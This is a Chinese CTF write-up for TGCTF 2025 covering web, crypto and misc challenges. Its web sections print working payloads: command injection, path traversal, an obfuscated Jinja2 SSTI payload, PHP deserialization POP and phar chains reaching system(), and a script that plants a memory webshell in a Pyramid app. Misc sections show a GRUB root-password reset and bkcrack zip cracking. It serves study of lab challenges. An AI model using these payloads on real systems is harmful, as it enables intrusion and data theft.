web

火眼

选第二个命令执行的

1
2
3
shell=`echo "<?= print_r(glob('/*'));" >1.php`;

shell=`echo "<?= file_get_contents('/tgfffffllllaagggggg');" >1.php`;

直面天命+(复仇)

1
2
GET /aazz?filename=a/b/c/d/secret.py
GET /aazz?filename=app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from fenjing import exec_cmd_payload, config_payload
import logging
logging.basicConfig(level = logging.INFO)

def waf(s: str): # 如果字符串s可以通过waf则返回True, 否则返回False
    blacklist = [
'{','}','popen','os','import','eval','_','system','read','base','globals'
    ]
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "tac /flag")
    # config_payload = config_payload(waf)

    print(f"{shell_payload=}")
    # print(f"{config_payload=}")

非预期

/aazz?filename=../../../proc/1/environ

预期-焚靖一把梭

1
2
3
4
5
%E5%A4%A9%E5%91%BDg%5B%27p%27%27op%27%5D%5B%22%5Cx5f%5Cx5f%5Cx67%5Cx6c%5Cx6f%5Cx62%5Cx61%5Cx6c%5Cx73%5Cx5f%5Cx5f%22%5D%5B%22%5Cx5f%5Cx5f%5Cx62%5Cx75%5Cx69%5Cx6c%5Cx74%5Cx69%5Cx6e%5Cx73%5Cx5f%5Cx5f%22%5D%5B%22%5Cx5f%5Cx5f%5Cx69%5Cx6d%5Cx70%5Cx6f%5Cx72%5Cx74%5Cx5f%5Cx5f%22%5D%28%27o%27%27s%27%29%5B%27p%27%27open%27%5D%28%27cat+tgffff11111aaaagggggggg%27%29%5B%27r%27%27ead%27%5D%28%29%E9%9A%BE%E8%BF%9D

{{g[\'p\'\'op\']["\\x5f\\x5f\\x67\\x6c\\x6f\\x62\\x61\\x6c\\x73\\x5f\\x5f"]["\\x5f\\x5f\\x62\\x75\\x69\\x6c\\x74\\x69\\x6e\\x73\\x5f\\x5f"]["\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f"](\'o\'\'s\')[\'p\'\'open\'](\'tac /flag\')[\'r\'\'ead\']()}}

这个{{}}换成天命难违就行,斜线适当替换

前端game+plus+Ultra

https://github.com/Ly4j/CVE-2025-31486

https://github.com/jackieya/ViteVulScan

github上cve脚本跑一下脚本就出了,第一个第二个通杀

第三个是个:cve-2025-32395

参考官方安全文档

https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4

1
curl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173

怀疑Users/doggy/Desktop/vite-project/不知道是啥,但知道是目录,试了几个,app好使,读环境变量出flag

ezupload

.bak文件看源码,

文件上传没有目录限制,先大小写绕过pHp,能下载但是没有被解析,然后就是.user.ini包含一下,访问index.php就行了

什么文件上传

看源码提示robots.txt

访问一堆东西

查看class.php

是一个反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
<?php 
  highlight_file(__FILE__); 
error_reporting(0); 
function best64_decode($str) 
  { 
    return base64_decode(base64_decode(base64_decode(base64_decode(base64_decode($str))))); 
  } 
class yesterday { 
  public $learn; 
  public $study="study"; 
  public $try; 
  public function __construct() 
  { 
    $this->learn = "learn<br>"; 
  } 
  public function __destruct() 
  { 
    echo "You studied hard yesterday.<br>"; 
    return $this->study->hard(); 
  } 
} 
class today { 
  public $doing; 
  public $did; 
  public $done; 
  public function __construct(){ 
    $this->did = "What you did makes you outstanding.<br>"; 
  } 
  public function __call($arg1, $arg2) 
  { 
    $this->done = "And what you've done has given you a choice.<br>"; 
    echo $this->done; 
    if(md5(md5($this->doing))==666){ 
      return $this->doing(); 
    } 
    else{ 
      return $this->doing->better; 
    } 
  } 
} 
class tommoraw { 
  public $good; 
  public $bad; 
  public $soso; 
  public function __invoke(){ 
    $this->good="You'll be good tommoraw!<br>"; 
    echo $this->good; 
  } 
  public function __get($arg1){ 
    $this->bad="You'll be bad tommoraw!<br>"; 
  } 

} 
class future{ 
  private $impossible="How can you get here?<br>"; 
  private $out; 
  private $no; 
  public $useful1;public $useful2;public $useful3;public $useful4;public $useful5;public $useful6;public $useful7;public $useful8;public $useful9;public $useful10;public $useful11;public $useful12;public $useful13;public $useful14;public $useful15;public $useful16;public $useful17;public $useful18;public $useful19;public $useful20; 

  public function __set($arg1, $arg2) { 
    if ($this->out->useful7) {  
      echo "Seven is my lucky number<br>"; 
      system('whoami'); 
    } 
  } 
  public function __toString(){ 
    echo "This is your future.<br>"; 
    system($_POST["wow"]); 
    return "win"; 
  } 
  public function __destruct(){ 
    $this->no = "no"; 
    return $this->no; 
  } 
} 
if (file_exists($_GET['filename'])){ 
  echo "Focus on the previous step!<br>"; 
} 
else{ 
  $data=substr($_GET['filename'],0,-4); 
  unserialize(best64_decode($data)); 
} 
// You learn yesterday, you choose today, can you get to your future? 
?>

搞pop链子

  1. 创建yesterday对象,study属性指向today对象。
  2. today对象的doing属性指向future对象。
  3. 当yesterday对象被反序列化后,析构函数被调用,触发study->hard()。
  4. 由于today没有hard方法,触发__call。
  5. call中,执行md5(md5($this->doing)),触发future的toString。

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
  class yesterday {
  public $study;
  }
  class today {
    public $doing;
}
class future {
}

$future = new future();
$today = new today();
$today->doing = $future;
$yesterday = new yesterday();
$yesterday->study = $today;

$serialized = serialize($yesterday);
$data = $serialized;
for ($i=0; $i<5; $i++) {
  $data = base64_encode($data);
}
echo $data;
?>

然后在payload后放入aaaa绕过$data=substr($_GET[‘filename’],0,-4);

得到flag

什么文件上传复仇

跟上边差不多👆,然后这个打包成phar,爆破文件缀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
highlight_file(__FILE__);
  class yesterday {
  public $study;
  }
  class today {
    public $doing;
}
class future {
}

$future = new future();
$today = new today();
$today->doing = $future;
$yesterday = new yesterday();
$yesterday->study = $today;


@unlink('test.phar');
$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($yesterday);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>

之后传文件,然后rce

熟悉的配方,熟悉的味道

看源码,是Pyramid框架

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pyramid.config import Configurator
from pyramid.request import Request
from pyramid.response import Response
from pyramid.view import view_config
from wsgiref.simple_server import make_server
from pyramid.events import NewResponse
import re
from jinja2 import Environment, BaseLoader

eval_globals = { #防止eval执行恶意代码
    '__builtins__': {},      # 禁用所有内置函数
    '__import__': None       # 禁止动态导入
}


def checkExpr(expr_input):
    expr = re.split(r"[-+*/]", expr_input)
    print(exec(expr_input))

    if len(expr) != 2:
        return 0
    try:
        int(expr[0])
        int(expr[1])
    except:
        return 0

    return 1


def home_view(request):
    expr_input = ""
    result = ""

    if request.method == 'POST':
        expr_input = request.POST['expr']
        if checkExpr(expr_input):
            try:
                result = eval(expr_input, eval_globals)
            except Exception as e:
                result = e
        else:
            result = "爬!"


    template_str = 【xxx】

    env = Environment(loader=BaseLoader())
    template = env.from_string(template_str)
    rendered = template.render(expr_input=expr_input, result=result)
    return Response(rendered)


if __name__ == '__main__':
    with Configurator() as config:
        config.add_route('home_view', '/')
        config.add_view(home_view, route_name='home_view')
        app = config.make_wsgi_app()

    server = make_server('0.0.0.0', 9040, app)
    server.serve_forever()

在checkExpr处有一个命令执行,而且这个功能有一个漏洞

先执行后检查,但是正常的执行没有反应,在网上搜说是打内存马,ai搓一个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests

url = 'http://node1.tgctf.woooo.tech:30864/'
cmd = input("command:")

payload =f'''def flag(request):
        import os
        payload = os.popen("{cmd}").read()
        return Response(payload)
config.add_route('shell', '/shell')
config.add_view(flag, route_name='shell')
config.commit()'''

data = {"expr": payload}

res = requests.post(url, data=data)
result = requests.get(url + '/shell')

print(result.text)

偷渡阴平(复仇)

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php


  $tgctf2025=$_GET['tgctf2025'];

if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i", $tgctf2025)){
  //hint:你可以对着键盘一个一个看,然后在没过滤的符号上用记号笔画一下(bushi
  eval($tgctf2025);
}
else{
  die('(╯‵□′)╯炸弹!•••*~●');
}

highlight_file(__FILE__);

过滤了很多函数符号,数字只有2没被过滤 可疑

但是括号很坑,它过滤的是中文括号,所以英文的可以

查看phpinfo

目前看不出什么有用的,仔细看了看被ban的函数,发现无参rce还是可以,利用session,在phpinfo查看

他是off。那就开启

成功命令执行,但是ls /不能执行,只能编码绕过,前面有个2没被过滤,那只有十六进制了。

函数hex2bin bin2hex

成功命令执行

得到flag

TG_wordpress

说是cve 上网搜索wordpress的cve

搜到的第一个就对了。。

..

TGCTF 2025 后台管理

登录页面

应该是sql注入

没回显,尝试报错注入

经测试

注入点应该是passowrd

猜测成功

数据库名tgctf

限制长度。没办法,猜测flag在flag表里

拿到flag

misc+密码

AAAAAAAA·真·签到

UGBRC{RI0G!O04_5C3_OVUI_DV_MNTB}从-1开始到30进行凯撒的移位,每次取一位,数字和符号不变

tRwSiAns

把题目脚本给deepseek直接跑出来的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import hashlib
from Crypto.Util.number import long_to_bytes
import math

# 填入题目给出的参数
n = 100885785256342169056765112203447042910886647238787490462506364977429519290706204521984596783537199842140535823208433284571495132415960381175163434675775328905396713032321690195499705998621049971024487732085874710868565606249892231863632731481840542506411757024315315311788336796336407286355303887021285839839
c1 = 41973910895747673899187679417443865074160589754180118442365040608786257167532976519645413349472355652086604920132172274308809002827286937134629295632868623764934042989648498006706284984313078230848738989331579140105876643369041029438708179499450424414752031366276378743595588425043730563346092854896545408366
c2 = 41973912583926901518444642835111314526720967879172223986535984124576403651553273447618087600591347032422378272332279802860926604693828116337548053006928860031338938935746179912330961194768693506712533420818446672613053888256943921222915644107389736912059397747390472331492265060448066180414639931364582445814

def compute_hash(x):
    return int(hashlib.md5(str(x).encode()).hexdigest(), 16)

# 计算h1和h2
h1 = compute_hash(307)
h2 = compute_hash(7)
t = h1 - h2

# 计算分子和分母
numerator = (-2 * t * c2 + pow(t, 4) - t * c1) % n
denominator = (-2 * pow(t, 3) + c2 - c1) % n

# 检查分母是否可逆
g = math.gcd(denominator, n)
if g != 1:
    print("无法求解,分母与n不互质,gcd =", g)
    exit()

# 计算b并验证
inv_denominator = pow(denominator, -1, n)
b = (numerator * inv_denominator) % n
assert pow(b, 3, n) == c2, "解得的b不满足条件"

# 计算明文m
m = (b - h2) % n
flag = long_to_bytes(m)

print("解密后的FLAG:", flag.decode())

你的运气是好是坏?

where it is(osint)

港墘站

这是啥o_o

肉眼看出来时间间隔不一样,有的特别快

└─# identify -format “%T “ 111.gif 84 71 67 84 70 123 89 111 117 95 99 97 117 103 104 116 95 117 112 95 119 105 116 104 95 116 105 109 101 33 125

宝宝rsa

后半段

:::info
from Crypto.Util.number import *

from sympy import cbrt

已知数据

p1 = 8362851990079664018649774360159786938757293294328116561219351503022492961843907118845919317399785168488103775809531198339213009936918460080250107807031483

q1 = 8312546034426788223492083178829355192676175323324230533451989649056072814335528263136523605276378801682321623998646291206494179416941978672637426346496531

c1 = 39711973075443303473292859404026809299317446021917391206568511014894789946819103680496756934914058521250438186214943037578346772475409633145435232816799913236259074769958139045997486622505579239448395807857034154142067866860431132262060279168752474990452298895511880964765819538256786616223902867436130100322

e1 = 262139 # e1 是一个 18 位的素数

n2 = 103873139604388138367962901582343595570773101048733694603978570485894317088745160532049473181477976966240986994452119002966492405873949673076731730953232584747066494028393377311943117296014622567610739232596396108513639030323602579269952539931712136467116373246367352649143304819856986264023237676167338361059

c2 = 51380982170049779703682835988073709896409264083198805522051459033730166821511419536113492522308604225188048202917930917221

e2 = 3

PART1 解密

n1 = p1 * q1

phi = (p1 - 1) * (q1 - 1)

d1 = pow(e1, -1, phi) # 计算私钥指数

m1 = pow(c1, d1, n1) # 解密 c1

m1_bytes = long_to_bytes(m1) # 转换为字节

检查填充

def remove_pkcs1_padding(data, key_size):

key_byte_size = key_size // 8

if len(data) != key_byte_size:

    raise ValueError("Data length does not match key size")

if data[0] != 0x00 or data[1] != 0x02:

    raise ValueError("Invalid padding format")

padding_end_index = data.find(b'\x00', 2)

if padding_end_index == -1:

    raise ValueError("Invalid padding format")

return data[padding_end_index + 1:]

try:

m1_unpadded = remove_pkcs1_padding(m1_bytes, key_size=1024)

print("m1_unpadded:", m1_unpadded)

except ValueError as e:

print("Padding removal failed:", e)

PART2 解密

m2 = int(cbrt(c2)) # 小指数攻击直接开立方根

m2_bytes = long_to_bytes(m2) # 转换为字节

拼接结果

flag = m1_bytes + m2_bytes

print(“Flag (raw bytes):”, flag)

try:

print("Flag (decoded):", flag.decode())  # UTF-8 解码

except UnicodeDecodeError:

print("Flag contains non-UTF-8 bytes")

:::

前半段👇

:::info
from Crypto.Util.number import *

from sympy import isprime

题目给定数据

p1 = 8362851990079664018649774360159786938757293294328116561219351503022492961843907118845919317399785168488103775809531198339213009936918460080250107807031483

q1 = 8312546034426788223492083178829355192676175323324230533451989649056072814335528263136523605276378801682321623998646291206494179416941978672637426346496531

c1 = 39711973075443303473292859404026809299317446021917391206568511014894789946819103680496756934914058521250438186214943037578346772475409633145435232816799913236259074769958139045997486622505579239448395807857034154142067866860431132262060279168752474990452298895511880964765819538256786616223902867436130100322

计算 n 和 phi

n1 = p1 * q1

phi = (p1 - 1) * (q1 - 1)

爆破 e1

for e1 in range(217, 218):

if isprime(e1) and GCD(e1, phi) == 1:

    try:

        d = inverse(e1, phi)

        m1 = pow(c1, d, n1)

        flag_part = long_to_bytes(m1)



        # 判断输出是否合理

        if b"flag" in flag_part or flag_part.isascii():

            print(f"[+] Found e1 = {e1}")

            print("[+] Decrypted flag part:", flag_part)

            break

    except:

        continue

:::

TeamGipsy&ctfer

下载附件,用虚拟机打开

是一个用户需要登录,可是不知道密码,那就改密码

在进度条加载的时候摁esc进入这个页面,选择这个,摁e编辑

把这个ro quiet 以及后面的改成rw init=/bin/bash

然后重启

选择root

在这里更改用户的密码

改完直接登陆

在mini里找到docker容器,里面有mysql 起一个查看

先查看1

什么都没有

看2

成功找到flag

费克特尔

找ai搓脚本,但是分解不出n,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from sympy import isprime, nextprime
from Crypto.Util.number import inverse

# 已知参数
c = 670610235999012099846283721569059674725712804950807955010725968103642359765806
n = 810544624661213367964996895060815354972889892659483948276203088055391907479553
e = 65537

# 尝试分解n
def factor_n(n):
    p = 2
    while p * p <= n:
        if n % p == 0:
            return p, n // p
        p = nextprime(p)
    return None, None

p, q = factor_n(n)
if p is None or q is None:
    print("无法分解n,解密失败")
else:
    # 计算phi(n)
    phi_n = (p - 1) * (q - 1)
    
    # 计算私钥d
    d = inverse(e, phi_n)
    
    # 解密密文
    m = pow(c, d, n)
    print(f"解密后的明文(十进制): {m}")
    print(f"解密后的明文(十六进制): {hex(m)}")
    print(f"解密后的明文(ASCII): {bytes.fromhex(hex(m)[2:]).decode()}")

找了个在线网站

https://factordb.com/index.php

先去分解n

然后跑脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from Crypto.Util.number import inverse

# 已知参数
c = 670610235999012099846283721569059674725712804950807955010725968103642359765806
n = 810544624661213367964996895060815354972889892659483948276203088055391907479553
e = 65537

# 分解结果
p1 = 113
p2 = 18251
p3 = 2001511
p4 = 214168842768662180574654641
p5 = 916848439436544911290378588839845528581

# 计算phi(n)
phi_n = (p1 - 1) * (p2 - 1) * (p3 - 1) * (p4 - 1) * (p5 - 1)

# 计算私钥d
d = inverse(e, phi_n)

# 解密密文
m = pow(c, d, n)

# 将明文从数字转换为十六进制和ASCII
hex_m = hex(m)[2:]
ascii_m = bytes.fromhex(hex_m).decode()

print(f"解密后的明文(十进制): {m}")
print(f"解密后的明文(十六进制): {hex_m}")
print(f"解密后的明文(ASCII): {ascii_m}")

mm不躲猫猫

我的ai查询语句

1
2
3
4
5
6
7
8
9
emmmmm !好多n啊,一共有307组n,c,找出隐藏的flag!格式样例为e = 65537
===============================
[n_1]
n = 104620414822063385079326749509982471870030893600285414264987224935916290272601764523383209465433613538037960991762459760833469310204135961581840403511596166088644211015428546275493892988418626726155859624501730928694822384537353845736516967991087412959351952563730377463899768183476698424362423043497737906623
c = 46039211893589761388229614285558239355119695176816949068907191054207506730440947101388028710988726734999719468830467682553990941948390688315715650976965231516653707125993971747796355564587123089802425266994022342763366946693028597366959030863496254672081216842747104144465753908738135854355761032614829767801

[n_2]
n = 136155385285881847647215965185525314111620437662648298206297512719879362719618304990758477078778565820295983050789197481446196249495631490160624235332536575107813683782766081951446123450465630897720159758797590205308439297488584076508093180968162324630134629769513496515404803402321721368832460090329222421827
c = 89662183394841207920629365819797260101947925700835102302177181731227878954957449881945530912024549859105187175733895858270028583699811542603429941425305090712263572930206869292032730915960185806373681528825761306228562959997158901987273897776177362099560025615451752245984242926480186459915665627188585304468总共有[n_60],写个脚本读取文件算出flag

豆包给的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import re

# 读取文件
def read_file(file_path):
    try:
        with open(file_path, 'r') as file:
            content = file.read()
        return content
    except FileNotFoundError:
        print("错误: 文件未找到!")
        return None
    except Exception as e:
        print(f"错误: 发生了一个未知错误: {e}")
        return None

# 解析文件内容,提取 n 和 c 的值
def parse_content(content):
    n_values = []
    c_values = []
    # 使用正则表达式匹配 n 和 c 的值
    pattern_n = r'n = (\d+)'
    pattern_c = r'c = (\d+)'
    n_matches = re.findall(pattern_n, content)
    c_matches = re.findall(pattern_c, content)
    for n in n_matches:
        n_values.append(int(n))
    for c in c_matches:
        c_values.append(int(c))
    return n_values, c_values

# 这里只是简单打印 n 和 c 的值,需要根据具体的加密方式来找出 flag
def find_flag(n_values, c_values):
    for i in range(len(n_values)):
        print(f"n_{i + 1}: {n_values[i]}, c_{i + 1}: {c_values[i]}")

if __name__ == "__main__":
    file_path = 'your_file.txt'  # 请将此替换为实际的文件路径
    content = read_file(file_path)
    if content is not None:
        n_values, c_values = parse_content(content)
        find_flag(n_values, c_values)

报错编码修复

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 读取文件
def read_file(file_path):
    try:
        with open(file_path, 'r', encoding='utf-8') as file:
            content = file.read()
        return content
    except FileNotFoundError:
        print("错误: 文件未找到!")
        return None
    except UnicodeDecodeError:
        print("错误: 文件编码格式可能不正确,请确认文件的实际编码格式并修改代码中指定的编码参数。")
        return None
    except Exception as e:
        print(f"错误: 发生了一个未知错误: {e}")
        return None

豆包不行,换GitHub的ai了

提问语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
import re
from Crypto.Util.number import inverse


# 读取文件
def read_file(file_path):
    try:
        with open(file_path, 'r', encoding='utf-8') as file:
            content = file.read()
        return content
    except FileNotFoundError:
        print("错误: 文件未找到!")
        return None
    except UnicodeDecodeError:
        print("错误: 文件编码格式可能不正确,请确认文件的实际编码格式并修改代码中指定的编码参数。")
        return None
    except Exception as e:
        print(f"错误: 发生了一个未知错误: {e}")
        return None


# 解析文件内容,提取 n 和 c 的值
def parse_content(content):
    n_values = []
    c_values = []
    # 使用正则表达式匹配 n 和 c 的值
    pattern_n = r'n = (\d+)'
    pattern_c = r'c = (\d+)'
    n_matches = re.findall(pattern_n, content)
    c_matches = re.findall(pattern_c, content)
    for n in n_matches:
        n_values.append(int(n))
    for c in c_matches:
        c_values.append(int(c))
    return n_values, c_values


# 解密函数
def decrypt(c, n, p, q, e=65537):
    # 计算欧拉函数 φ(n)
    phi_n = (p - 1) * (q - 1)
    # 计算私钥指数 d
    d = inverse(e, phi_n)
    # 解密操作
    m = pow(c, d, n)
    return m


# 找出 flag
def find_flag(n_values, c_values, p, q, e=65537):
    for i in range(len(n_values)):
        n = n_values[i]
        c = c_values[i]
        try:
            m = decrypt(c, n, p, q, e)
            print(f"n_{i + 1} 解密后的明文: {m}")
        except ValueError:
            print(f"n_{i + 1} 解密失败,可能是 p、q 或 e 的值不正确。")


if __name__ == "__main__":
    file_path = 'F:/新建文件夹/challenge.txt'  # 请将此替换为实际的文件路径
    # 假设已知 p 和 q,需要你根据实际情况替换
    p = 123456789
    q = 987654321
    e = 65537
    content = read_file(file_path)
    if content is not None:
        n_values, c_values = parse_content(content)
        find_flag(n_values, c_values, p, q, e)
    我的这个代码是豆包给我生成的用来解题emmmmm !好多n啊,一共有307组n,c,找出隐藏的flag!格式样例为e = 65537
===============================
[n_1]
n = 104620414822063385079326749509982471870030893600285414264987224935916290272601764523383209465433613538037960991762459760833469310204135961581840403511596166088644211015428546275493892988418626726155859624501730928694822384537353845736516967991087412959351952563730377463899768183476698424362423043497737906623
c = 46039211893589761388229614285558239355119695176816949068907191054207506730440947101388028710988726734999719468830467682553990941948390688315715650976965231516653707125993971747796355564587123089802425266994022342763366946693028597366959030863496254672081216842747104144465753908738135854355761032614829767801

[n_2]
n = 136155385285881847647215965185525314111620437662648298206297512719879362719618304990758477078778565820295983050789197481446196249495631490160624235332536575107813683782766081951446123450465630897720159758797590205308439297488584076508093180968162324630134629769513496515404803402321721368832460090329222421827
c = 89662183394841207920629365819797260101947925700835102302177181731227878954957449881945530912024549859105187175733895858270028583699811542603429941425305090712263572930206869292032730915960185806373681528825761306228562959997158901987273897776177362099560025615451752245984242926480186459915665627188585304468总共有[n_60],写个脚本读取文件算出flag的,但是生成出来的是n_59 解密后的明文: 20403406141493684779901801717171878997304858497859485979484313592481953030493339733131489842226518295886251932867805283859691662073575758407248172704108089349285382406660942221624325709360586923617185039509699171916078747353872811454961022544054103688324911100857275562253013826780700997387407419474907940404
n_60 解密后的明文: 96385388587017577456674072827965196618026914784913692529126216887421535606278409811251440081969515030872219374053357246157555404381960514539228411687241830915628729117859659986287189345785843817450691133148895981104084160080464137716984445706453983758443514755503146411536844794629946520429020859399509140709,我没有找到flag,帮我修改一下,让我获得flag,里面的所有问题交给你解决

回应

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
import re
from math import gcd
from Crypto.Util.number import inverse, long_to_bytes


# 读取文件内容
def read_file(file_path):
    try:
        with open(file_path, 'r', encoding='utf-8') as file:
            content = file.read()
        return content
    except FileNotFoundError:
        print("错误: 文件未找到!")
        return None
    except UnicodeDecodeError:
        print("错误: 文件编码格式可能不正确,请确认文件的实际编码格式并修改代码中指定的编码参数。")
        return None
    except Exception as e:
        print(f"错误: 发生了一个未知错误: {e}")
        return None


# 解析文件内容,提取 n 和 c 的值
def parse_content(content):
    n_values = []
    c_values = []
    # 使用正则表达式匹配 n 和 c 的值
    pattern_n = r'n = (\d+)'
    pattern_c = r'c = (\d+)'
    n_matches = re.findall(pattern_n, content)
    c_matches = re.findall(pattern_c, content)
    for n in n_matches:
        n_values.append(int(n))
    for c in c_matches:
        c_values.append(int(c))
    return n_values, c_values


# 动态寻找公共质因数
def find_common_factors(n_values):
    for i in range(len(n_values)):
        for j in range(i + 1, len(n_values)):
            p = gcd(n_values[i], n_values[j])
            if p > 1:  # 找到公共因数
                return i, j, p
    return None  # 如果没有找到公共因数,返回 None


# 解密函数
def decrypt(c, n, p, q, e=65537):
    phi_n = (p - 1) * (q - 1)  # 计算欧拉函数 φ(n)
    d = inverse(e, phi_n)  # 计算私钥指数 d
    m = pow(c, d, n)  # 解密操作
    return m


# 主程序逻辑
def main():
    file_path = 'F:/新建文件夹/challenge.txt'  # 请将此替换为实际的文件路径
    e = 65537

    # 读取文件内容
    content = read_file(file_path)
    if content is None:
        return

    # 解析 n 和 c 的值
    n_values, c_values = parse_content(content)
    if not n_values or not c_values:
        print("错误: 未能解析出有效的 n 和 c 值!")
        return

    # 寻找 n 的公共质因数
    common = find_common_factors(n_values)
    if common is None:
        print("错误: 未找到任何 n 的公共质因数!")
        return

    i, j, p = common
    n1, n2 = n_values[i], n_values[j]
    q1, q2 = n1 // p, n2 // p

    # 使用找到的 n 和 c 解密
    c = c_values[i]
    try:
        m = decrypt(c, n1, p, q1, e)
        flag = long_to_bytes(m).decode()  # 转换为可读字符串
        print(f"[+] 找到 Flag: {flag}")
    except UnicodeDecodeError:
        print(f"[-] 解密成功但无法解码: {m}(可能需要检查编码格式)")
    except Exception as e:
        print(f"[-] 发生错误: {e}")


if __name__ == "__main__":
    main()

出flag

next is the end

连点器没点出来,给我卡死了,换Linux跑跑试试

脚本如下👇

===== 📝 你只需要改这里:压缩包文件名 =====

ZIP_FILE="next_is_the_end.zip"

===== 🚀 解压流程开始 =====

i=0

while true; do
found_zip=false
# 遍历当前目录及子目录中的 zip 文件

for zip in $(find . -type f -name "*.zip"); do

    found_zip=true

    unzip -q "$zip" -d .            # 解压到当前目录

    rm -f "$zip"                    # 删除原 zip 文件

done
((i++))

echo "第 $i 层已解压完成..."
if ! $found_zip; then

    break

fi
done



echo

echo "✅ 所有嵌套 zip 解压完成。以下是最终文件:"

find . -type f ! -name "*.zip"

ez_zip

第一步

真爆破啊?

第二步

压缩包里面也有这个东西,但是字符数不匹配,sh512之后就一样了,明文爆破,但不知道啥软件压缩的,不好使上一个工具

参考https://siascert.cn/2024/07/15/ZIP%E6%98%8E%E6%96%87%E6%94%BB%E5%87%BB/index.html

爆破出来密钥b39bc130 8183a9f1 d5381ad8 

1
2
3
4
5
D:\网安\bkcrack-1.7.1-win64\bkcrack-1.7.1-win64>bkcrack.exe -C End.zip -k b39bc130 8183a9f1 d5381ad8 -U 1.zip 1
bkcrack 1.7.1 - 2024-12-21
[17:11:37] Writing unlocked archive 1.zip with password "1"
100.0 % (2 / 2)
Wrote unlocked archive.

第三步